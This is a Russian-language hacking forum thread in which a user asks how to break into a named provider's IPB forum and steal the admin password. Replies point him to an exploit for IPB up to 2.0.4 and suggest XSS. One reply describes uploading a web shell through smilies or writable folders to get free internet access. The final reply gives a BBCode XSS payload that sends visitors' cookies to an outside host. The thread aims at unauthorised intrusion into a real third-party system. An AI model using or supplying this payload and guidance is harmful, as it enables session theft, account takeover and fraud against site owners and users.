![]() |
Взлом IPB
Есть форум (forum.prov.ru)
Знаю, что он на IPB, но проблемма в том, что я незнаю версию. Скажите как взломать этот форум, и достать пароль админа ? Только не надо все готовое - я сам хочу взломать. |
Версия: _http://forum.prov.ru/admin.php
Как взломать: Сам же сказал, что сам хочешь. Поиск по форуму используй. |
пробуй сплойт для ipb до 2.0.4 на rst.void.ru если не подойдет сплойт можно вывод что это версия форума либо 2.0.4 либо выше,наверно понятно =)
|
Если не получится сплойт, используй xss-уязвимость.
|
Бедный Azazel какой раз говорит что используете поиск прежде чем создавать тему.
|
Цитата:
2diablo если ето провайдера форум и у тебя получиться попасть в админку сможешь залить шелл через смайлики или если неполучиться так прочитай статью на сайте или в форуме есть тема я создавал там как залить в папку открытую на запись папки (/uploads/ u /lang/-воснавном ета папка открыта когда форум русифицируют ну где смотрел везде в нее есть доступ на запись так вот главное можешь заить анонимайзер какойнить и получить инет нахаляву ---------------------------------------------------- 1 если тебя спалят а это обязательно тебя либо отключат и ты заплатишь за штраф и за траффик 2.либо просто заплатишь за траффик |
Цитата:
Сам ты дама. Вот он я http://www.cofac.org/azazel.jpg :):):) |
Так, стоп. Версия форума - 2.0.4
Я там зарегестрирован. Подробно - что делать дальше ? |
Цитата:
Ты прям так сказал вроде зарегаться на форуме это уже пол дела. А если серьёзно, то попробуй XSS-атаку провести. Юзай поиск по форуму это уже не раз обсуждалось. ЗЫ вот попробуй заюзать: Код HTML:
[email]wj@wj[url=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);` |
Цитата:
|
| Время: 16:07 |